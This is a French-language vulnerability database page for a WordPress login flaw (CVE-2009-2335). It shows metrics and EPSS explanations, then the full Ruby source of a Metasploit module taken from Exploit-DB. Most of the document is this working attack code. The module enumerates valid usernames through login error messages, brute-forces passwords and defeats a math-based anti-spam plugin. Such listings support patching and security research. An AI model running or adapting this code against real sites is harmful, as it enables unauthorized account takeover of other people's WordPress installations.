Faiblesses connexes
CWE-ID |
Nom de la faiblesse |
Source |
CWE-16 |
Category : Configuration Weaknesses in this category are typically introduced during the configuration of the software. |
|
Métriques
Métriques |
Score |
Gravité |
CVSS Vecteur |
Source |
V2 |
5 |
|
AV:N/AC:L/Au:N/C:P/I:N/A:N |
[email protected] |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 17702
Date de publication : 2011-08-19 22h00 +00:00
Auteur : Tiago Ferreira & Heyder Andrade
EDB Vérifié : No
##
# $Id: wordpress_login_enum.rb 12196 2011-04-01 00:51:33Z egypt $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::AuthBrute
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'Wordpress Brute Force and User Enumeration Utility',
'Version' => '$Revision: 12196 $',
'Description' => 'Wordpress Authentication Brute Force and User Enumeration Utility',
'Author' => [
'Alligator Security Team',
'Tiago Ferreira <tiago.ccna[at]gmail.com>',
'Heyder Andrade <heyder[at]alligatorteam.org>' # Block-Spam-By-Math-Reloaded Bypass
],
'References' =>
[
['BID', '35581'],
['CVE', '2009-2335'],
['OSVDB', '55713'],
],
'License' => MSF_LICENSE
)
register_options(
[ Opt::RPORT(80),
OptString.new('URI', [false, 'Define the path to the wp-login.php file', '/wp-login.php']),
OptBool.new('VALIDATE_USERS', [ true, "Enumerate usernames", true ]),
OptBool.new('BSBM_BYPASS', [ true, "Block-Spam-By-Math-Reloaded Bypass ", false]),
OptBool.new('BRUTEFORCE', [ true, "Perform brute force authentication", true ]),
], self.class)
end
def target_url
"http://#{vhost}:#{rport}#{datastore['URI']}"
end
def run_host(ip)
if datastore['VALIDATE_USERS']
@users_found = {}
vprint_status("#{target_url} - WordPress Enumeration - Running User Enumeration")
each_user_pass { |user, pass|
do_enum(user)
}
unless (@users_found.empty?)
print_good("#{target_url} - WordPress Enumeration - Found #{uf = @users_found.keys.size} valid #{uf == 1 ? "user" : "users"}")
end
end
if datastore['BRUTEFORCE']
vprint_status("#{target_url} - WordPress Brute Force - Running Bruteforce")
if datastore['VALIDATE_USERS']
if @users_found && @users_found.keys.size > 0
vprint_status("#{target_url} - WordPress Brute Force - Skipping all but #{uf = @users_found.keys.size} valid #{uf == 1 ? "user" : "users"}")
else
vprint_status("#{target_url} - WordPress Brute Force - No valid users found. Exiting.")
return
end
end
each_user_pass { |user, pass|
if datastore['VALIDATE_USERS']
next unless @users_found[user]
end
do_login(user, pass)
}
end
end
def do_enum(user=nil)
post_data = "log=#{Rex::Text.uri_encode(user.to_s)}&pwd=x&wp-submit=Login"
print_status("#{target_url} - WordPress Enumeration - Checking Username:'#{user}'")
begin
res = send_request_cgi({
'method' => 'POST',
'uri' => datastore['URI'],
'data' => post_data,
}, 20)
valid_user = false
if (res and res.code == 200 )
if (res.body.to_s =~ /Incorrect password/ )
valid_user = true
elsif (res.body.to_s =~ /document\.getElementById\(\'user_pass\'\)/ )
valid_user = true
else
valid_user = false
end
else
print_error("#{target_url} - WordPress Enumeration - Enumeration is not possible. #{res.code} response")
return :abort
end
if valid_user
print_good("#{target_url} - WordPress Enumeration- Username: '#{user}' - is VALID")
report_auth_info(
:host => rhost,
:sname => 'http',
:user => user,
:port => rport,
:proof => "WEBAPP=\"Wordpress\", VHOST=#{vhost}"
)
@users_found[user] = :reported
return :next_user
else
vprint_error("#{target_url} - WordPress Enumeration - Invalid Username: '#{user}'")
return :skip_user
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::Timeout::Error, ::Errno::EPIPE
end
end
def smartaleck(values)
answer = 0
values.each { |a| answer+=a.to_i }
return answer
end
def getvalues(response)
i = 0
values = []
while (i <= 1) do
response.body.match(%r{.?(mathvalue#{i}).*(value=).([\d]+)})
values[i] = $3
i += 1
end
return values
end
def baserequest()
begin
res = send_request_cgi({
'method' => 'GET',
'uri' => datastore['URI'],
}, 20)
return res
end
end
def do_login(user=nil,pass=nil)
if (datastore['BSBM_BYPASS'])
v = getvalues(baserequest())
sec_answer = smartaleck(v)
post_data = "log=#{Rex::Text.uri_encode(user.to_s)}&pwd=#{Rex::Text.uri_encode(pass.to_s)}&mathvalue2=#{sec_answer}&mathvalue0=#{v[0]}&mathvalue1=#{v[1]}&&wp-submit=Login"
else
post_data = "log=#{Rex::Text.uri_encode(user.to_s)}&pwd=#{Rex::Text.uri_encode(pass.to_s)}&wp-submit=Login"
vprint_status("#{target_url} - WordPress Brute Force - Trying username:'#{user}' with password:'#{pass}'")
end
begin
res = send_request_cgi({
'method' => 'POST',
'uri' => datastore['URI'],
'data' => post_data,
}, 20)
if (res and res.code == 302 )
if res.headers['Set-Cookie'].match(/wordpress_logged_in_(.*);/i)
print_good("#{target_url} - WordPress Brute Force - SUCCESSFUL login for '#{user}' : '#{pass}'")
report_auth_info(
:host => rhost,
:port => rport,
:sname => 'http',
:user => user,
:pass => pass,
:proof => "WEBAPP=\"Wordpress\", VHOST=#{vhost}, COOKIE=#{res.headers['Set-Cookie']}",
:active => true
)
return :next_user
end
print_error("#{target_url} - WordPress Brute Force - Unrecognized 302 response")
return :abort
elsif res.body.to_s =~ /login_error/
vprint_error("#{target_url} - WordPress Brute Force - Failed to login as '#{user}'")
return
else
print_error("#{target_url} - WordPress Brute Force - Unrecognized #{res.code} response") if res
return :abort
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::Timeout::Error, ::Errno::EPIPE
end
end
end
Products Mentioned
Configuraton 0
Wordpress>>Wordpress >> Version To (excluding) 2.8.1
Wordpress>>Wordpress_mu >> Version To (excluding) 2.8.1
Références